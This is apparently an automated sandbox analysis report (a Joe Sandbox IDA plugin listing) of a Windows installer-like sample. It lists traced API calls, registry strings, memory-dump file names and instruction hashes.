                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$DispatchPeekTranslate
                                                                                                            • String ID:
                                                                                                            • API String ID: 4217535847-0
                                                                                                            • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                                            • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                                                                            • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                                            • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                                                                            APIs
                                                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Prop$Window
                                                                                                            • String ID:
                                                                                                            • API String ID: 3363284559-0
                                                                                                            • Opcode ID: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                                                            • Instruction ID: 52b24e3238e4314aade48f96f4600562d70e15a3c995b5dbeb32d15e299d8853
                                                                                                            • Opcode Fuzzy Hash: 51d1e881393928d894513cc5a6715d0f9133524890ebfc277249263b82eead75
                                                                                                            • Instruction Fuzzy Hash: 4CF0BD71701220ABEB10AB598C85FA632DCAB09715F16017ABE09EF286C678DC50C7A8
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 0041EE74
                                                                                                            • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                                                                            • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnableEnabledVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3234591441-0
                                                                                                            • Opcode ID: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                                                            • Instruction ID: 4e94e345e4a8e87798afb8fb42df504bf5387c41ee1a2ac16dc0d48b177cce37
                                                                                                            • Opcode Fuzzy Hash: 5cbd57f62825f5fd03c8e352543d82b631dfda465d6e8043ea84f90506a45dcf
                                                                                                            • Instruction Fuzzy Hash: 4DE0EDB8100304AAE750AB2BEC81A57769CBB55314F49843BAC099B293DA3ED8449A78
                                                                                                            APIs
                                                                                                            • SetActiveWindow.USER32(?), ref: 00480C2A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ActiveWindow
                                                                                                            • String ID: InitializeWizard
                                                                                                            • API String ID: 2558294473-2356795471
                                                                                                            • Opcode ID: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
                                                                                                            • Instruction ID: 7183a9f40d151cc4564f9c637f0f3a65215fdab84d47651bf6ef09736f3ca39c
                                                                                                            • Opcode Fuzzy Hash: 723738b8fbe3fabf7eb5c80f16a5b290c90bba58ac79f9736125b6795bdc7b1c
                                                                                                            • Instruction Fuzzy Hash: C511C1302142049FD754EB6AFD82B0A7BA8E716728F10447BE810C77A1EB79AC64C79D
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047B222,00000000,0047B35C), ref: 0047B021
                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047AFF1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen
                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                                            • API String ID: 47109696-1019749484
                                                                                                            • Opcode ID: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
                                                                                                            • Instruction ID: 32b1a4b4f3febb624688285ac2ab15cdeec5a734a0466c395ac52858640c886b
                                                                                                            • Opcode Fuzzy Hash: 3b78e152b17f15840806b4e47da0d6875f627c855d5fc6915719fd9d10737491
                                                                                                            • Instruction Fuzzy Hash: 7CF0E93170021467D700A55A6D02BAF528DCB80358F20407FF508EB342DABA9D06039C
                                                                                                            APIs
                                                                                                            • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                                                            Strings
                                                                                                            • Inno Setup: Setup Version, xrefs: 0046DE8D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Value
                                                                                                            • String ID: Inno Setup: Setup Version
                                                                                                            • API String ID: 3702945584-4166306022
                                                                                                            • Opcode ID: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
                                                                                                            • Instruction ID: 3f565b73c41be68d18d1c675279a4c2ca8d62721aeaae2bfa6e8ff1167108c85
                                                                                                            • Opcode Fuzzy Hash: 308a2d795db4d9f089db4d3a0d80863649b6fa39a5e40ce591918164ebf00fab
                                                                                                            • Instruction Fuzzy Hash: 6AE06D717016043FD710AA2BDC85F6BBADCDF983A5F10403AB908EB392D578DD0081A8
                                                                                                            APIs
                                                                                                            • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046E544,?,?,00000000,0046E6DA,?,_is1,?), ref: 0046DEEF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Value
                                                                                                            • String ID: NoModify
                                                                                                            • API String ID: 3702945584-1699962838
                                                                                                            • Opcode ID: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
                                                                                                            • Instruction ID: 16e32e904041cf2989cb5be4c2021f94977a521c7974260517dd4293f9cbe128
                                                                                                            • Opcode Fuzzy Hash: fcf48f294370718ea72f2974fc8c507718464dc9ad4e6ec171c14c9c323779b1
                                                                                                            • Instruction Fuzzy Hash: 64E04FB0A04304BFEB04EB55CD4AF6F77ACDB48754F104059BA089B291E674EE00C668
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                                            Strings
                                                                                                            • System\CurrentControlSet\Control\Windows, xrefs: 0042DD5E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open
                                                                                                            • String ID: System\CurrentControlSet\Control\Windows
                                                                                                            • API String ID: 71445658-1109719901
                                                                                                            • Opcode ID: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                                                            • Instruction ID: aea9d63627e202933d8ac4c6cad7c964b34c473e1f77024d29d81bfc1069fbec
                                                                                                            • Opcode Fuzzy Hash: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                                                            • Instruction Fuzzy Hash: 6FD09E72920128BB9B009A89DC41DF7775DDB19760F44401AF90497141C1B4AC5197E4
                                                                                                            APIs
                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000), ref: 0045384B
                                                                                                            • FindClose.KERNEL32(000000FF,00453876,0045386F,?,00000000,004538D9,?,?,-00000001,00000000,?,0047B861,00000000,0047B7B0,00000000,00000001), ref: 00453869
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 2066263336-0
                                                                                                            • Opcode ID: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
                                                                                                            • Instruction ID: 9ec0e3c397c6f5708f2a232916c112a37fe27e538a562d44e8698fe4f4711445
                                                                                                            • Opcode Fuzzy Hash: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
                                                                                                            • Instruction Fuzzy Hash: AA81B37090424D9FCF11EF65C8417EFBBB4AF4934AF1480AAE84067392D3399B4ACB58
                                                                                                            APIs
                                                                                                            • GetACP.KERNEL32(?,?,00000001,00000000,0047CC8B,?,-0000001A,0047EBEA,-00000010,?,00000004,0000001A,00000000,0047EF37,?,0045D288), ref: 0047CA22
                                                                                                              • Part of subcall function 0042E244: 73A1A570.USER32(00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 0042E253
                                                                                                              • Part of subcall function 0042E244: EnumFontsA.GDI32(?,00000000,0042E230,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E27E
                                                                                                              • Part of subcall function 0042E244: 73A1A480.USER32(00000000,?,0042E2A3,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E296
                                                                                                            • SendNotifyMessageA.USER32(0001043A,00000496,00002711,-00000001), ref: 0047CBF2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: A480A570EnumFontsMessageNotifySend
                                                                                                            • String ID:
                                                                                                            • API String ID: 2685184028-0
                                                                                                            • Opcode ID: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
                                                                                                            • Instruction ID: fce8b5d73ed99f1e2ef66d4a8ce886950ac346dadb3b378a3b6f7676f451f25a
                                                                                                            • Opcode Fuzzy Hash: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
                                                                                                            • Instruction Fuzzy Hash: 585172346001048BC720EF26E9C668B3799EB54309B50C57FB8489B7A7C73CED468B9E
                                                                                                            APIs
                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DB64
                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DBD4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3660427363-0
                                                                                                            • Opcode ID: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                                                            • Instruction ID: dfb8c8f379aef3e71039058fa16673b54f7d2a66c5b8750361213b9ce9dda202
                                                                                                            • Opcode Fuzzy Hash: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                                                            • Instruction Fuzzy Hash: E6416371E04129AFDB11DF96D881BAFB7B8EB44704F91846AE800F7244D778EE00DB95
                                                                                                            APIs
                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DE94
                                                                                                            • RegCloseKey.ADVAPI32(?,0042DF05,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DEF8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseEnum
                                                                                                            • String ID:
                                                                                                            • API String ID: 2818636725-0
                                                                                                            • Opcode ID: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
                                                                                                            • Instruction ID: 371203d48d58dd12687a59eda9429109c9bfccb849147f5bab4b3e409d052118
                                                                                                            • Opcode Fuzzy Hash: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
                                                                                                            • Instruction Fuzzy Hash: F431D570F04648AEDB11DFA6DD42BBFBBB8EB49304F91407BE500B7280D6789E01CA19
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00600000,00002000,00000001,?,?), ref: 0045CF34
                                                                                                            • BZ2_bzDecompressInit._ISDECMP(?,00000000,00000000,?,?,?,00000000,00600000,00002000,00000001,?,?), ref: 0045CF7A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocDecompressInitVirtualZ2_bz
                                                                                                            • String ID:
                                                                                                            • API String ID: 3582128297-0
                                                                                                            • Opcode ID: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
                                                                                                            • Instruction ID: 1a4503516ee109fc6ad3b2554e9268a8a2595667017840414d64b8ef7de05fed
                                                                                                            • Opcode Fuzzy Hash: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
                                                                                                            • Instruction Fuzzy Hash: D0110872600700BFD310CF258982B96BBA6FF44751F044127E908D7681E7B9A928CBD8
                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
                                                                                                            • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 4097029671-0
                                                                                                            • Opcode ID: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
                                                                                                            • Instruction ID: 91321923317e208a88a5ae6d58faa7c91e6d3ee961cd2f37f7af0eb3e2dea987
                                                                                                            • Opcode Fuzzy Hash: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
                                                                                                            • Instruction Fuzzy Hash: A401DFB1300604AFD710FF69DC92E5B77A9DB8A7187118076F500AB6D0DA7AAC1096AD
                                                                                                            APIs
                                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00452322
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00452348), ref: 0045232A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastMove
                                                                                                            • String ID:
                                                                                                            • API String ID: 55378915-0
                                                                                                            • Opcode ID: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
                                                                                                            • Instruction ID: cd5642aef6cf07d7f8e9267465b44b1c19008dc4a29441b527747bf004e73304
                                                                                                            • Opcode Fuzzy Hash: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
                                                                                                            • Instruction Fuzzy Hash: 0301F971B04744BBCB00DFB99D415AEB7ECDB4932575045BBFC08E3252EA7C5E088598
                                                                                                            APIs
                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E09
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1375471231-0
                                                                                                            • Opcode ID: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
                                                                                                            • Instruction ID: 865e03444c10a102779f68a5f284ef85491b61924e311ce2fbbb44c68c5af0ec
                                                                                                            • Opcode Fuzzy Hash: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
                                                                                                            • Instruction Fuzzy Hash: 03F0C871A04604ABCB10DF759C4269EB7E8DB49315B5049B7FC04E7652E63D5E088598
                                                                                                            APIs
                                                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451F9F
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451FA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteErrorFileLast
